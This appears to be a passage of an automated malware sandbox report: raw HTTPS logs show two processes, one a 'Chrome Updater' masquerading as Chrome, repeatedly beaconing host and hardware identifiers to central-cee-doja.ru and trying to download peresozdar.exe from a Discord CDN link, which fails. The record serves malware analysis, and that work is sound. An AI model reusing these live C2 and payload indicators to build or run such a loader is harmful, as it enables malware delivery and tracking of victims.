                                                                                    2024-01-04 07:30:43 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    79192.168.2.649800104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:43 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:43 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lka38gGP9vNwzj%2B1ZTl%2BCy%2BsfS01bf8zCqxSL0X6vE1Af3EbVh9aOOxRpNEJVk77trfI%2B8D6dvSYzKrRMGxyzmKzUkFavNmmeWs6w6GeFM22%2BTDU%2BW8b9sSZfnpbEilNwuMjadJ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c71dbb145806-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:43 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    80192.168.2.649801104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:43 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:43 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bvumy5gd3z60ilUZD0KXzakM6FKdtlv%2FjCmuCw685Bw7RuwXYp8DMruWyUW0JeuOnSkOBcvGGvpspamsmwHte%2BcHFAYnS2It5spPpjSL9KnA2vjfr1nSNza9Zix9gyd8Fg8ToY0O"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c71e5a727fae-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:43 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    81192.168.2.649802104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:43 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:44 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FYINqFbwsZ83nSHugDL8MdldlNTz%2BN1alOC9zVEKm6vCIgETMY3bGqDs4tJyssK%2FWHM1pGqOKsvrqU7FvLjkm2lZfjFqMoXlDt6XdSXRtvJVGJ4KYyKavH7qAvW%2B%2BCKLomVVyJ9F"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7222d592892-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:44 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    82192.168.2.649803104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:44 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:44 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HiGLnhDOjbWfP5NO7TqbQiVBLZ9GR1gfm4pQhREIza%2FpSr9N015mWX4y1k9wJ2oPgXU0rvhNPk3lYf%2BO3Et4oXTpDr7J1AWnQKpKHXUlusRz8qvHy53r998C7N2niquWzfzBl%2BjO"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c722da263988-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:44 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    83192.168.2.649805162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:44 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:44 UTC1329INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:44 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7265a8c07f4-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 19
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:44 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=bUtI.5J_2PgvkYBV44CX4tIsKVRYCghh2C8AvdTdaoI-1704353444-1-AfVS/AffWb1vGuFHfOdIrtd8vq4n/Fb0vcBwzZMNV4Jp3/DTBesmKafMVgy9rf1P+lu6jVmXgjaAksMuu/wawo8=; path=/; expires=Thu, 04-Jan-24 08:00:44 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4OxfSwUQGlP0OQOwkeEZGjeUugsT4MNCaitrkaZCNq1bnqKgdcW4hzpvXAiZB9Ss2uLwFabZY5hL3KkqLvaYGon97q8rw5241AfKcFIFaSEiDRc4cUm%2BqUnzluWZ4soAZZqBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ymRGHbgPTC8A7g.9ixp3XwXf1zAqtJoEJ9ICBsnj5Uw-1704353444883-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:44 UTC40INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><E
                                                                                    2024-01-04 07:30:44 UTC196INData Raw: 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: rror><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    84192.168.2.649806162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:45 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:45 UTC1339INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:45 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7284b977fbb-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 7
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:45 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=JLnun6wzBljTlaA9fa9MYPn54ntzr2uODxjweSmRXdU-1704353445-1-AbUxQwvLVUV+n7xncA4LI5nZs608GWNYQXFRIDdrGPDKSSuh9xaUfLzipDgsmEyQa31pt2iEPEtWi4RSBzdzqss=; path=/; expires=Thu, 04-Jan-24 08:00:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2Fayb8htspFty3ikJD7W2zDSEbTZAX07wVtqEobum75KzT5ZhjoR8gfpkuxQda2BCtAyf36gRkwzWp5a7zabtXaBpzXzxQaN5sWUAjoO79aBgfsOwUlgSADiHdsdtF%2FfLIn0%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=omO_qHYD0Xy83DHj41sHv6smBaGx3IlWM4zElGewl5Q-1704353445188-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:45 UTC30INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='
                                                                                    2024-01-04 07:30:45 UTC206INData Raw: 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    85192.168.2.649807104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:45 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:46 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R0ZT7gIeTQFipT3s3xK6B3OeCY%2BS2QvvyObBFS%2By2QtU%2FPwtOKEvGzLocOhTMT4TnWnZj%2BZB7I3ryv1dAdnnHrE8O7OfT5M3fE%2BLHBLijytZVp101GEtqGg1QC7VN6Rt6BD3NhvU"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c72a9fc83b11-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:46 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    86192.168.2.649809104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:47 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:47 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Djud6aQ2aEPluPfBoo1tPcKjq2dfxqNnOs0c4DkMUo3ujgMWM3oE6o%2B8ZygPAk4v9bWh2Dathrgi7XKC6FStDzsOoQb4qsb7b2Kbt01ZbbYvjjev7mtj9u9AWN0G6OILtpRnMYH3"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c735ba5b1ff7-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:47 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    87192.168.2.649808104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:47 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:47 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:47 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZPTzVFPv2yeLZflkNYjOiwyUNUyq571ZRZ7pnFfhUmTsk30dn%2FPG1e51ijxdrwU3l4E98PGypz9RYDY8Uv0rZj%2BeBlvp9V2x6QnMcQ0BYS7F4megf81HKpaZDGQUeATnI%2BnhOuCk"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c735bbd1827e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:47 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    88192.168.2.649810162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:47 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:48 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:48 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c739d94c81bb-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 10
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:48 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=zCo_GmtsvRW1avlzgXodEEwmxrtd42m8SvmpllzLeDQ-1704353448-1-AXy0YXlY/uHUFw+tY6sgFdPqya9TWmgB3I6nZ2VgO+ohIi+heTp8mx9cXE/QPvp5otQgLCS2kzrEqsnplGPoykw=; path=/; expires=Thu, 04-Jan-24 08:00:48 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WQiLeIRGM2bHAdrfuyQsVtvN6j%2F755CeM0oGbMeavMxDQYA8xEutf189UtxH%2B%2BxnEPBccO4g3E6%2B0E7cPreSLGbAOQRTpMXqdFj6Zhv7sTGz5nePS6vMPPhdnsxIoRTm5neHBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=yem_vQ08PS_Lt1kTgHBg3CHHmDLoxTgvpGloyUfV10k-1704353448008-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:48 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
                                                                                    2024-01-04 07:30:48 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    89192.168.2.649811104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:48 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:48 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1lkbJe2UGbF0e%2Ft0%2FRywtIF6ME4c4l%2B2eVGxZngbwVNPjXqgRhgQA8cNn5x1vEIS%2BKpve2UkEX8Bcpv5CAiu6kC42EvzbAN91IGwYTPzQiWUzABSmFNj%2B7zxjN6YzahMawwXZvel"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c73b48299c6d-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:48 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    90192.168.2.649812104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:48 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:48 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pkme6ugI8Mc9dR2ivAI9jw4s2uafXfX%2F7E25yM2fU%2FujZehl5hT6Be5EbQDEIsDQ6D2mAxYBWoEfxOPXNgw1e1YrosMmuqg%2FlkBaoSz6z8Qd3wbwXzNy1zm1Ev3q2goc%2BfaJwV1x"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
